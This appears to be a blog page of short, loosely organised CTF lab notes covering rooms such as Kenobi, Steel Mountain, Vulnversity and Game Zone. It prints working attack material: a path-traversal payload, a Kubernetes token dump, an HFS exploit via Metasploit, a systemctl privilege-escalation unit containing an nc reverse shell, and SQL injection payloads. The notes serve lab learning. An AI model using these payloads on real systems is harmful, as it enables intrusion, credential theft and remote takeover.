Reversing ELF
Hey, hey, hey. Fun, love it.

gdb crackme4
info functions
b *0x0000000000400520    # set a breakpoint
run test
info registers
x/s 0x7fffffffe990       # the previous step showed the registers; this step shows the value at this register's address

Fun, love it.
0day
Absurd rabbit hole: the RSA can't be solved, it's a fake. Sharp intuition this time: Shellshock.

gobuster dir -u 10.10.1.48/cgi-bin/ -w /Users/dionysus/CTF/tools/wordlists/dirb/common.txt -x sh,cgi    # specify the extensions

Took a look at test.cgi; what an old hole. Nice.

gcc -static poc.c -o poc    # compile it statically

Then it complained it couldn't find cc1, so find where cc1 lives and export it into the environment variable. Learned some basics.
ColddBox
wpscan --url http://10.10.101.23 -e vp,vt,u

Absurd. Garbage box, boring.
Git Happens
A pure giveaway, I knew it: git log. Sigh, just spend a few hours learning git and you're set.
Island Orchestration
The target box is broken; let's see how others wrote it up.

kali@kali:~$ sudo nmap -v10 -sC -sV -p22,80 -oA nse 10.10.158.170
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9f:ae:04:9e:f0:75:ed:b7:39:80:a0:d8:7f:bd:61:06 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCpKksU81PRNTKP1wxKXB9jq0Yk6id6JCuj4gYTAPk932sjBdUV4OhoMBP1m2cITHGWBWiE02KzRSkgL9X0FZL6CJRxo09N2uHXp6XT5+V+VMf1/5B1xgETNdpqgltDpqYudiKpNQzRpkvvtvCntDr ...
Kubernetes for Everyone
Let's go.

public/plugins/alertlist/../../../../../../../../../../etc/passwd

Directory traversal. Where is grafana's default config file? /etc/grafana/grafana.ini. Nothing much in there. Look at main.css: it contains OZQWO4TBNZ2A====, which base32-decodes to vagrant; guessing that's the ssh account. The password is hereiamatctf907, which is a bit baffling. It's k0s.

k0s kubectl get secret
k0s kubectl describe secret default-token-nhwb5

====
ca.crt:     1103 bytes
namespace:  7 bytes
token:      eyJhbGciOiJSUzI1NiIsImtpZCI6IjloanZwZEh2a1pRTlY1Tk1uSHo3RnJnaEt1alE2a2NCNGowOWtNb0ktSE0ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby ...
Virtualization and Containers
k8s startup:

minikube start: start the whole cluster
kubectl get pods -A: look up the pods (all namespaces)
kubectl get nodes: list all nodes in the cluster
kubectl get namespaces: list all namespaces
kubectl config view: view the config
kubectl config current-context: show the current context
kubectl config use-context <context-name>: switch to the given context
kubectl get deployment: view the Deployment resources in the Kubernetes cluster
kubectl get service
kubectl get rs: ReplicaSet information
kubectl delete deployment hello-tryhackme: delete a deployment
kubectl apply -f <file.yaml>: apply one or more YAML config files to create or update resources
kubectl describe <resource> <name>: e.g. kubectl describe pod < ...
Pentesting Fundamentals
Intro stuff. Rules of Engagement.
Kenobi
Enumerate SMB:

enum4linux -a 10.10.202.59
smbclient -L \\10.10.202.59
smbclient //10.10.202.59/anonymous

Pulled down a log.txt.

cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerpr ...
Steel Mountain
Port 8080 has HFS, CVE-2014-6287; used msf windows/http/rejetto_hfs_exec and took it in one go. search -f *.txt. Er. Next, use a script:

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
Upload PowerUp.ps1
load powershell
powershell_shell    // enter powershell mode
. .\PowerUp.ps1
Invoke-AllChecks

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendDat ...
Vulnversity
The first part is a standard file upload, using phtml to get past the extension check. The second part is SUID privesc via systemctl.

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"
[Install]
WantedBy=multi-user.target' > $TB

Hard to write that way; use cat instead.

TF=$(mktemp).service
cat > 1.txt << EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"
[Install]
WantedBy=multi-user.target
EOF
cat 1.txt > $TF
systemctl ...
Game Zone
Universal-password login, er: ' or 1=1 -- -. Haven't played in so long I'd forgotten; is this allowed to be said? (

searchitem=' union select 1,2,(SELECT group_concat(schema_name) FROM information_schema.schemata) -- -
searchitem=' union select 1,2,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'db') -- -
searchitem=' union select 1,2,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'db' AND table_name = 'users') -- -

Just look at users directly. pwd, ssh in. Check the sockets: ss -tulpn N ...
dionysus
I'm drunk and want to sleep; you may go.
Wherever my heart is at peace.
Announcements